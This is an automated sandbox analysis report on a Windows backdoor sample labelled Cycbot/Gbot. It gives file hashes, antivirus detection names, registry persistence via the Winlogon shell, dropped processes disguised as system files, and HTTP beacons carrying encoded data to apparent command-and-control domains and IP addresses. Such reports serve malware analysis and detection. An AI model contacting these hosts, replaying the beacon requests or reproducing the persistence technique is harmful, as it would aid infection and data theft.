Analysis Date: 2014-11-19 12:48:04
MD5: 716f31ec56529b0430d643bf1334ab7e
SHA1: 85b28d78a62dc80b813ff534c9c9193b888fde6c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 9c857010274f720c5b0f137fd24b1821 sha1: cb1ab24cb0dd62fb3154e5d12d1ff21aa2b266ac size: 110592
Section .rdata md5: 926fbe0dde2297250efdad9d7043483a sha1: cab43b1a52b703e7c2d148d36669843ee84a5aa3 size: 1024
Section .data md5: f96a3a3ac569b77717f24c039dce4bcf sha1: a100a29923ae846f36a98c7c367f3a713066aa8b size: 71680
Section .reloc md5: 2db2f2a8603d738715a9f9a1513faf7c sha1: 008b5eeb7f2276065ba6a6ea5cde6d3cbaca2b5f size: 1024
Timestamp: 2005-09-25 04:51:28
PEhash: 07292c64ac21ab2710cd931e1ca7cdc5b89fb64a
IMPhash: 80b0c0ca1a123c51b4690c620492bf52
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-449
AV Dr. Web: Trojan.DownLoader4.60349
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.SXV
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: hollandandbarrett.com
Winsock DNS: yourblogresources.com
Winsock DNS: onlinesearchdb.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: hollandandbarrett.com
Type: A
213.62.84.113
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: onlinesearchdb.com
Type: A
DNS: yourblogresources.com
Type: A
HTTP GET: http://hollandandbarrett.com/images/footer/account.jpg?v12=11&tq=gKZEtzyPBM8lpTk5Q0%2ByTnzl%2BWVuRSEAEEP5Imc6QzK1QbUHE85J1Oah4dje39tF05jlKMky2UpPXDotyY4U5N1%2FNSmtB7d1h2faz%2FFf8XidGymShvD8oOOmFenD30c5TiL%2FJnHqpk9EmPYfZrhoJ4r%2FpnuGiQy5Tnv9Wty7GjCu%2BEE7jzcCkzVyAWDhJ4mcosS7i3N5Z85DW4zPFw6vBnUmSTt61SCKba9izuhNsYpq2TsDJIEZp8vEoH16sIMtzX4aT72eHdbMn95%2B
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 213.62.84.113:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
Strings